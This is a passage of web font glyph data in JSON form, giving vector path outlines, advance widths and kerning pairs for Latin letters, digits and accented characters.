73v0,48,31,72,93,72xm189,-726v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":530},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm510,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":675},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm390,-781r-77,0r-111,-162r113,0","w":675},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169","w":485,"k":{"\u0153":17,"\u00f6":17,"\u00f5":17,"\u00f4":17,"\u00f3":17,"\u00f2":17,"\u00eb":17,"\u00ea":17,"\u00e9":17,"\u00e8":17,"\u00e6":8,"\u00e5":8,"\u00e4":8,"\u00e3":8,"\u00e2":8,"\u00e1":8,"\u00e0":8,"w":20,"o":17,"e":17,"d":10,"c":17,"a":8}},{"d":"804,-61r-40,0r0,61r-73,0r0,-61r-174,0r0,-71r146,-295r84,0r-147,295r91,0r0,-83r73,0r0,83r40,0r0,71xm638,-712r-335,712r-81,0r335,-712r81,0xm181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":844},{"d":"922,0r-451,0r0,-58v-78,95,-254,77,-335,-10v-70,-75,-66,-134,-69,-288v-2,-133,5,-222,69,-288v83,-86,256,-105,335,-10r0,-58r450,0r0,96r-342,0r0,210r291,0r0,94r-291,0r0,216r343,0r0,96xm429,-135v63,-47,42,-275,34,-371v-9,-110,-173,-156,-245,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v50,60,161,58,211,0","w":977},{"d":"201,0r-108,0r0,-712r108,0r0,712xm281,-943r-111,162r-77,0r75,-162r113,0","w":294},{"d":"289,-474v136,2,187,95,190,236v4,155,-70,245,-210,245v-125,0,-198,-69,-206,-191r102,0v9,66,43,99,104,99v82,0,108,-55,108,-153v0,-99,-35,-149,-104,-149v-54,0,-88,21,-101,64r-93,0r0,-389r384,0r0,91r-292,0r0,188v26,-27,65,-41,118,-41"},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-761r-111,162r-77,0r75,-162r113,0","w":264},{"w":125},{"d":"55,-366v0,-139,69,-236,183,-255r0,-91r80,0r0,90v54,7,101,31,141,74r-68,66v-25,-27,-52,-43,-82,-48r0,328v30,-5,57,-21,82,-48r68,66v-40,43,-87,67,-141,74r0,110r-80,0r0,-111v-114,-19,-183,-116,-183,-255xm247,-528v-121,20,-121,307,0,324r0,-324","w":498},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0","w":544,"k":{"\u0153":80,"\u0152":10,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":40,"\u00c5":40,"\u00c4":40,"\u00c3":40,"\u00c2":40,"\u00c1":40,"\u00c0":40,"z":40,"x":40,"u":40,"s":80,"r":40,"q":80,"p":40,"o":80,"n":40,"m":40,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":10,"O":10,"J":40,"G":10,"C":10,"A":40,".":80}},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169","w":537,"k":{"y":10,"x":20,"w":7,"v":10}},{"d":"179,-521r-101,0r0,-191r101,0r0,191","w":257},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm477,-786r-92,0r0,-108r92,0r0,108xm261,-786r-92,0r0,-108r92,0r0,108","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"381,-607r-112,91r0,-196r112,0r0,105xm190,-607r-112,91r0,-196r112,0r0,105","w":459,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"w":500},{"d":"266,-718v116,0,208,81,208,197v0,67,-29,118,-86,153v65,39,98,95,98,167v0,124,-98,207,-220,207v-123,0,-219,-83,-219,-207v0,-72,33,-128,98,-167v-57,-35,-86,-86,-86,-153v0,-116,91,-197,207,-197xm266,-410v61,0,106,-47,106,-108v0,-61,-45,-109,-106,-109v-61,0,-105,48,-105,109v0,61,44,108,105,108xm266,-85v64,0,117,-53,117,-118v0,-65,-53,-119,-117,-119v-64,0,-117,54,-117,119v0,65,53,118,117,118"},{"d":"220,-436r-102,0r0,-350r102,0r0,350xm220,74r-102,0r0,-350r102,0r0,350","w":344},{"w":166},{"w":166},{"d":"181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":362},{"d":"260,-719v118,0,207,82,207,199v0,72,-30,123,-89,152v67,29,100,85,100,168v0,129,-93,207,-218,207v-125,0,-217,-73,-218,-200r102,0v2,68,49,107,116,108v69,0,117,-47,116,-118v-1,-80,-49,-123,-136,-117r0,-89v81,5,124,-34,125,-108v1,-66,-43,-110,-105,-110v-63,0,-103,42,-107,102r-102,0v2,-115,93,-194,209,-194"},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm435,-604r-92,0r0,-108r92,0r0,108xm219,-604r-92,0r0,-108r92,0r0,108","w":568},{"d":"314,-513v110,-2,177,76,176,186r0,327r-102,0r0,-311v2,-69,-39,-110,-102,-111v-63,0,-103,43,-103,111r0,311r-102,0r0,-712r102,0r0,256v35,-38,79,-57,131,-57","w":566},{"d":"897,0r-455,0r0,-162r-235,0r-84,162r-118,0r374,-712r518,0r0,97r-347,0r0,209r296,0r0,97r-296,0r0,212r347,0r0,97xm442,-254r0,-361r-188,361r188,0","w":952},{"d":"256,-497v88,0,163,75,163,163v0,88,-75,163,-163,163v-88,0,-163,-75,-163,-163v0,-88,75,-163,163,-163","w":512},{"w":250},{"d":"482,-316r-168,0r0,169r-95,0r0,-169r-168,0r0,-95r168,0r0,-168r95,0r0,168r168,0r0,95xm482,0r-431,0r0,-95r431,0r0,95"},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm495,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm241,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"822,-285r-77,0r0,-279r-90,179r-71,0r-90,-179r0,279r-77,0r0,-427r77,0r125,243r126,-243r77,0r0,427xm346,-643r-115,0r0,358r-76,0r0,-358r-114,0r0,-69r305,0r0,69","w":883},{"d":"190,-607r-112,91r0,-196r112,0r0,105","w":268,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"431,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm431,-62v159,0,289,-134,289,-294v0,-160,-130,-294,-289,-294v-159,0,-289,134,-289,294v0,160,130,294,289,294xm329,-356v0,78,32,136,108,136v30,0,58,-12,85,-35r46,47v-39,35,-82,52,-131,52v-111,1,-179,-85,-179,-200v0,-115,68,-201,179,-200v47,0,91,17,131,52r-46,47v-27,-23,-55,-35,-85,-35v-76,0,-108,58,-108,136","w":862},{"d":"498,-107r-76,0r0,107r-99,0r0,-107r-288,0r0,-95r251,-510r110,0r-250,510r177,0r0,-166r99,0r0,166r76,0r0,95"},{"w":200},{"d":"421,0r-378,0r0,-81r252,-335r-238,0r0,-91r364,0r0,81r-254,335r254,0r0,91","w":469},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm440,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"w":200},{"d":"54,-509v0,-121,87,-198,204,-207r0,-90r82,0r0,89v76,5,140,31,191,80r-69,68v-34,-32,-78,-50,-131,-54r0,216v135,13,225,66,225,204v0,124,-96,197,-216,206r0,111r-82,0r0,-108v-94,-4,-170,-35,-228,-94r72,-71v42,42,97,65,165,68r0,-222v-123,-8,-213,-70,-213,-196xm267,-622v-90,-3,-144,114,-81,175v19,18,46,28,81,33r0,-208xm331,-93v68,-5,117,-40,118,-107v1,-73,-50,-100,-118,-105r0,212","w":608},{"d":"482,-225r-168,0r0,168r-95,0r0,-168r-168,0r0,-95r168,0r0,-167r95,0r0,167r168,0r0,95"},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0","w":625,"k":{"\u201d":80,"\u201c":80,"\u2019":80,"\u2018":80,"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"266,-718v125,0,213,86,211,213v0,46,-18,104,-53,175r-162,330r-109,0r153,-306v-135,46,-250,-59,-250,-195v0,-127,86,-217,210,-217xm266,-380v68,0,109,-52,109,-123v0,-70,-42,-124,-109,-124v-67,0,-108,53,-108,124v0,69,40,123,108,123"},{"d":"544,0r-451,0r0,-712r108,0r0,615r343,0r0,97","w":574,"k":{"\u201d":150,"\u201c":150,"\u2019":150,"\u2018":150,"\u0152":30,"\u00d6":30,"\u00d5":30,"\u00d4":30,"\u00d3":30,"\u00d2":30,"\u00c7":21,"y":60,"Y":80,"W":40,"V":70,"U":21,"T":80,"Q":30,"O":30,"J":-8,"G":30,"C":30}},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm447,-943r-111,162r-77,0r75,-162r113,0","w":603},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0","w":646,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"245,-712r-22,500r-80,0r-22,-500r124,0xm239,0r-112,0r0,-109r112,0r0,109","w":332},{"w":333},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm375,-781r-77,0r-111,-162r113,0","w":647,"k":{"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm309,-599r-77,0r-111,-162r113,0","w":530},{"d":"57,-263v0,-150,40,-250,179,-250v55,0,100,20,133,60r0,-54r99,0r0,504v1,127,-87,217,-217,214v-88,-1,-129,-22,-179,-67r65,-65v32,30,69,45,110,45v104,2,127,-84,119,-194v-33,39,-76,58,-131,58v-136,0,-178,-102,-178,-251xm263,-104v88,0,103,-71,103,-159v0,-88,-15,-158,-103,-159v-88,0,-104,71,-104,159v0,88,16,159,104,159","w":549},{"d":"530,-615r-196,0r0,615r-108,0r0,-615r-196,0r0,-97r500,0r0,97","w":560,"k":{"\u0153":70,"\u0152":20,"\u00f8":70,"\u00e7":70,"\u00e6":70,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"\u00c6":60,"\u00c5":60,"\u00c4":60,"\u00c3":60,"\u00c2":60,"\u00c1":60,"\u00c0":60,"z":46,"y":46,"x":46,"w":46,"v":46,"u":46,"s":70,"r":46,"q":70,"p":46,"o":70,"n":46,"m":46,"g":70,"e":70,"d":70,"c":70,"a":70,"Q":20,"O":20,"J":80,"G":20,"C":20,"A":60,".":80}},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm404,-761r-111,162r-77,0r75,-162r113,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"w":1000},{"d":"721,0r-108,0r0,-476r-164,347r-80,0r-168,-347r0,476r-108,0r0,-712r108,0r208,443r204,-443r108,0r0,712","w":813},{"d":"568,0r-125,0r-155,-273r-154,273r-124,0r220,-365r-206,-347r124,0r140,255r141,-255r124,0r-206,347","w":578,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":26,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"190,-608r-112,0r0,-104r112,-93r0,197","w":268,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"629,0r-99,0r-329,-501r0,501r-108,0r0,-712r99,0r329,500r0,-500r108,0r0,712","w":722},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0","w":468,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10,".":65}},{"d":"201,0r-108,0r0,-712r108,0r0,712","w":294},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm393,-761r-111,162r-77,0r75,-162r113,0","w":530},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm492,-786r-92,0r0,-108r92,0r0,108xm276,-786r-92,0r0,-108r92,0r0,108","w":675},{"d":"538,-712r-146,290r87,0r0,78r-127,0r-26,51r0,52r153,0r0,78r-153,0r0,163r-108,0r0,-163r-153,0r0,-78r153,0r0,-52r-26,-51r-127,0r0,-78r87,0r-147,-290r118,0r150,314r148,-314r117,0","w":544},{"d":"619,-513v113,-2,182,78,182,189r0,324r-102,0r0,-309v2,-71,-38,-113,-102,-113v-61,0,-105,43,-105,108r0,314r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v68,-81,227,-76,279,17v41,-49,94,-74,159,-74","w":877},{"d":"316,-513v142,0,180,92,180,259v0,169,-37,260,-181,260v-56,0,-101,-20,-134,-60r0,54r-100,0r0,-712r102,0r0,256v32,-38,76,-57,133,-57xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm426,-786r-92,0r0,-108r92,0r0,108xm210,-786r-92,0r0,-108r92,0r0,108","w":544},{"d":"592,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-54,51,-92,78,-189,79v-79,0,-137,-27,-175,-80v-35,53,-89,80,-163,80v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259v75,0,129,27,164,81v35,-54,89,-81,160,-81xm706,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169","w":862},{"w":1000},{"d":"590,-504v0,100,-62,168,-142,189r164,315r-126,0r-150,-300r-135,0r0,300r-108,0r0,-712r276,0v128,-3,221,84,221,208xm361,-392v71,1,121,-41,121,-111v0,-70,-50,-113,-121,-112r-160,0r0,223r160,0","w":655,"k":{"J":16}},{"d":"441,-715v151,0,232,83,231,234r0,483r-96,-2r0,-50v-32,38,-74,57,-127,57v-126,0,-176,-90,-176,-241v0,-150,46,-241,175,-241v52,0,94,19,126,56v11,-125,-27,-206,-143,-206r-126,0v-91,0,-143,52,-142,145r0,312v1,62,13,79,50,110r-70,70v-56,-49,-79,-78,-79,-175r0,-318v-1,-152,79,-235,231,-234r146,0xm472,-80v85,0,102,-65,102,-154v0,-89,-17,-155,-102,-155v-85,0,-101,65,-101,155v0,90,16,154,101,154","w":736},{"d":"321,-414r-109,0r0,-109r109,0r0,109xm484,-230r-436,0r0,-95r436,0r0,95xm321,-33r-109,0r0,-109r109,0r0,109"},{"d":"235,-724v93,0,175,82,175,175v0,93,-82,174,-175,174v-93,0,-174,-81,-174,-174v0,-93,81,-175,174,-175xm235,-457v50,0,91,-42,91,-92v0,-50,-41,-93,-91,-93v-50,0,-90,43,-90,93v0,50,40,92,90,92","w":471},{"d":"404,-604r-92,0r0,-108r92,0r0,108xm188,-604r-92,0r0,-108r92,0r0,108","w":500},{"d":"424,-466r-37,65r-111,-69r4,131r-75,0r4,-131r-111,69r-37,-65r115,-61r-115,-62r37,-65r111,69r-4,-130r75,0r-4,130r111,-69r37,65r-115,62","w":485},{"d":"194,60r-116,95r0,-271r116,0r0,176","w":272},{"d":"355,0r-102,0r0,-601r-139,122r0,-113r139,-120r102,0r0,712"},{"d":"225,-285r-121,0r0,-122r121,0r0,122xm222,60r-116,95r0,-271r116,0r0,176","w":303},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm409,-761r-111,162r-77,0r75,-162r113,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0xm388,-604r-92,0r0,-108r92,0r0,108xm172,-604r-92,0r0,-108r92,0r0,108","w":468},{"d":"363,-712v131,-3,228,89,228,216v0,127,-97,216,-228,216r-162,0r0,280r-108,0r0,-712r270,0xm357,-378v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-156,0r0,237r156,0","w":629,"k":{"\u0153":10,"\u00f8":10,"\u00e7":10,"\u00e6":10,"\u00c6":50,"\u00c5":50,"\u00c4":50,"\u00c3":50,"\u00c2":50,"\u00c1":50,"\u00c0":50,"s":10,"q":10,"o":10,"g":10,"e":10,"d":10,"c":10,"a":10,"J":120,"A":50,".":110}},{"d":"381,-608r-112,0r0,-104r112,-93r0,197xm190,-608r-112,0r0,-104r112,-93r0,197","w":459,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"343,-712v194,2,265,135,256,351v-7,161,-7,218,-72,294v-82,95,-268,61,-434,67r0,-712r250,0xm453,-145v48,-55,37,-203,37,-307v0,-42,-16,-91,-37,-115v-50,-59,-150,-47,-252,-48r0,518v102,-2,201,10,252,-48","w":666,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":30,"A":10}},{"d":"186,-607r-108,0r0,-108r108,0r0,108xm-19,120v57,3,100,1,100,-59r0,-568r102,0r0,574v0,83,-51,142,-139,140r-63,0r0,-87","w":264},{"d":"366,-521r-101,0r0,-191r101,0r0,191xm179,-521r-101,0r0,-191r101,0r0,191","w":444},{"d":"259,-480v-2,66,37,85,103,79r0,90v-66,-5,-103,13,-103,79r0,167v-1,93,-46,140,-143,139r-71,0r0,-91r39,0v64,-1,73,-14,73,-78r0,-161v0,-60,26,-81,67,-100v-41,-19,-67,-40,-67,-100r0,-161v7,-81,-37,-79,-112,-78r0,-91r71,0v97,-1,142,46,143,139r0,167","w":407},{"d":"598,0r-108,0r0,-311r-289,0r0,311r-108,0r0,-712r108,0r0,304r289,0r0,-304r108,0r0,712","w":691},{"d":"186,-607r-108,0r0,-108r108,0r0,108xm183,0r-102,0r0,-507r102,0r0,507","w":264},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm325,-599r-77,0r-111,-162r113,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"200,0r-122,0r0,-122r122,0r0,122","w":278},{"d":"267,-42r-230,-230r230,-229r0,123r-107,106r107,107r0,123","w":339},{"d":"186,-91v84,0,129,-54,129,-142r0,-479r108,0r0,487v3,139,-102,232,-237,231v-69,0,-127,-23,-173,-69r72,-71v29,27,48,43,101,43","w":506,"k":{"A":10}},{"d":"225,-285r-121,0r0,-122r121,0r0,122xm225,0r-121,0r0,-122r121,0r0,122","w":303},{"w":250},{"d":"289,-624v-104,0,-170,108,-103,177v32,33,103,36,161,45v121,18,187,74,191,199v7,186,-226,247,-398,187v-40,-14,-77,-38,-110,-72r72,-71v45,45,106,68,182,68v84,1,145,-33,147,-109v3,-103,-100,-103,-190,-116v-112,-16,-186,-73,-187,-193v0,-130,101,-209,238,-209v89,0,163,27,221,81r-69,68v-39,-37,-90,-55,-155,-55","w":590,"k":{"Y":20,"S":10,"J":20}},{"d":"504,-648v96,72,78,266,71,430v-3,74,-26,107,-64,148v-73,79,-200,99,-307,49r-31,65r-82,0r51,-108v-94,-73,-78,-266,-71,-430v8,-181,206,-272,372,-197r30,-65r83,0xm403,-599v-88,-55,-206,1,-219,93v-8,59,-12,312,12,340xm463,-206v8,-58,12,-314,-12,-340r-207,433v87,55,206,-1,219,-93","w":652},{"d":"489,-366v60,24,107,81,107,165v0,128,-88,202,-215,201r-288,0r0,-712r277,0v126,-2,215,72,215,195v0,71,-46,131,-96,151xm361,-411v68,1,116,-35,116,-102v0,-67,-48,-103,-116,-102r-160,0r0,204r160,0xm371,-97v70,1,117,-42,117,-109v0,-66,-48,-108,-117,-108r-170,0r0,217r170,0","w":663,"k":{"J":23}},{"d":"343,-621v-84,0,-129,54,-129,142r0,88r129,0r0,78r-129,0r0,216r302,0r0,97r-411,0r0,-313r-62,0r0,-78r62,0r0,-96v-3,-139,103,-232,238,-231v69,0,127,23,173,69r-72,71v-29,-27,-48,-43,-101,-43","w":564},{"d":"975,-277r-392,391r-131,0r345,-343r-745,0r0,-97r745,0r-345,-343r131,0","w":1027},{"d":"309,-718v96,0,169,66,169,159v0,71,-73,128,-128,162r150,179v25,-35,37,-82,38,-143r98,0v-3,95,-27,168,-71,219r119,142r-131,0r-58,-70v-58,51,-124,76,-197,76v-140,0,-232,-77,-230,-212v1,-108,68,-149,141,-201v-37,-42,-71,-82,-74,-153v-3,-94,76,-158,174,-158xm309,-629v-42,0,-70,29,-70,70v0,23,18,55,55,98v34,-21,86,-59,86,-97v0,-39,-31,-71,-71,-71xm169,-208v-4,71,57,121,129,121v49,0,95,-18,136,-55r-169,-201v-51,35,-92,61,-96,135","w":730},{"d":"905,-231r-838,0r0,-97r838,0r0,97","w":972},{"d":"623,-426r-92,0r-20,124r79,0r0,94r-94,0r-33,208r-106,0r33,-208r-137,0r-32,208r-107,0r33,-208r-79,0r0,-94r94,0r20,-124r-81,0r0,-94r95,0r31,-196r107,0r-31,196r136,0r31,-196r106,0r-31,196r78,0r0,94xm424,-426r-136,0r-20,124r137,0","w":672},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm483,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":603},{"d":"128,-806v72,77,104,89,104,211r0,478v-4,121,-33,134,-104,211r-70,-70v50,-54,70,-60,70,-147r0,-466v-2,-85,-20,-94,-70,-147","w":317},{"d":"386,-761r-111,162r-77,0r75,-162r113,0","w":500},{"d":"571,172r-571,0r0,-70r571,0r0,70","w":571},{"d":"648,0r-127,0r-200,-351r-120,144r0,207r-108,0r0,-712r108,0r0,358r291,-358r132,0r-231,279","w":658,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":34,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":277},{"d":"182,-726v38,0,94,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":500},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169xm319,64r-51,147r-101,0r70,-147r82,0","w":488,"k":{"\u0153":17,"\u00e6":8,"o":17,"e":17,"c":8,"a":8}},{"d":"268,6v-140,0,-207,-98,-207,-255v0,-142,47,-225,163,-247v27,-5,53,-4,76,2r-45,-81r-116,0r0,-72r78,0r-39,-70r108,0r39,70r87,0r0,72r-50,0v50,104,114,177,114,326v0,158,-67,255,-208,255xm268,-85v84,0,106,-58,106,-164v0,-107,-22,-164,-106,-164v-82,0,-105,58,-105,164v0,106,22,164,105,164","w":537},{"d":"484,-98r-95,0r0,-141r-341,0r0,-95r436,0r0,236"},{"d":"229,-716v114,0,169,77,169,206v0,130,-54,207,-169,207v-113,0,-168,-78,-168,-207v0,-129,55,-206,168,-206xm229,-377v69,0,85,-44,85,-133v0,-88,-16,-132,-85,-132v-67,0,-85,46,-85,132v1,87,17,133,85,133","w":458},{"d":"481,0r-123,0r-106,-173r-107,173r-123,0r174,-259r-167,-248r123,0r100,165r99,-165r123,0r-166,248","w":503,"k":{"\u0153":20,"\u00f8":20,"\u00f6":20,"\u00f5":20,"\u00f4":20,"\u00f3":20,"\u00f2":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":2